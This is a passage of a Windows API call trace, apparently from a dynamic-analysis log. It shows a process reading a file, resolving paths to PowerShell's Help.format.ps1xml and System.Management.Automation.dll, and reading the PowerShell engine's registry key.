	[0101.151] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.152] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.152] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.152] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.152] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.153] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.153] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.153] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.157] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.157] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.157] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.157] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.158] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.158] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.158] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.159] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.159] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.159] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.160] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.160] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.160] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.160] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.161] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.161] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.161] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.162] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.162] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.162] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.162] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.163] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.163] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.163] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.164] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.164] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.164] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.164] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.164] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.165] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.165] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0xf37, lpOverlapped=0x0) returned 1
	[0101.165] ReadFile (in: hFile=0x334, lpBuffer=0x3592097, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3592097*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0101.165] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0101.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0101.165] SetErrorMode (uMode=0x1) returned 0x1
	[0101.166] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0101.166] SetErrorMode (uMode=0x1) returned 0x1
	[0101.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0101.166] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x334) returned 0x0
	[0101.166] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0101.166] CoTaskMemAlloc (cb=0x5a) returned 0x28a760
	[0101.166] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x28a760, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0101.167] CoTaskMemFree (pv=0x28a760) 
	[0101.167] RegCloseKey (hKey=0x334) returned 0x0
	[0101.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0101.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0101.181] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x28894fa7, Data2=0x50d0, Data3=0x4ddf, Data4=([0]=0x8a, [1]=0xc1, [2]=0x80, [3]=0xa5, [4]=0x48, [5]=0x4b, [6]=0x99, [7]=0x5a))) returned 0x0
	[0101.182] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xbca1486b, Data2=0x9ee0, Data3=0x4ccd, Data4=([0]=0xb6, [1]=0x45, [2]=0x3a, [3]=0x70, [4]=0xe6, [5]=0x82, [6]=0x90, [7]=0x1f))) returned 0x0
	[0101.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.453] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2869f630, Data2=0x6742, Data3=0x4cb9, Data4=([0]=0x88, [1]=0x31, [2]=0x47, [3]=0xe, [4]=0x75, [5]=0xdd, [6]=0xd0, [7]=0xed))) returned 0x0
	[0101.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.457] VirtualQuery (in: lpAddress=0xeb520, lpBuffer=0xec3e0, dwLength=0x30 | out: lpBuffer=0xec3e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.458] VirtualQuery (in: lpAddress=0xeb5b0, lpBuffer=0xec470, dwLength=0x30 | out: lpBuffer=0xec470*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
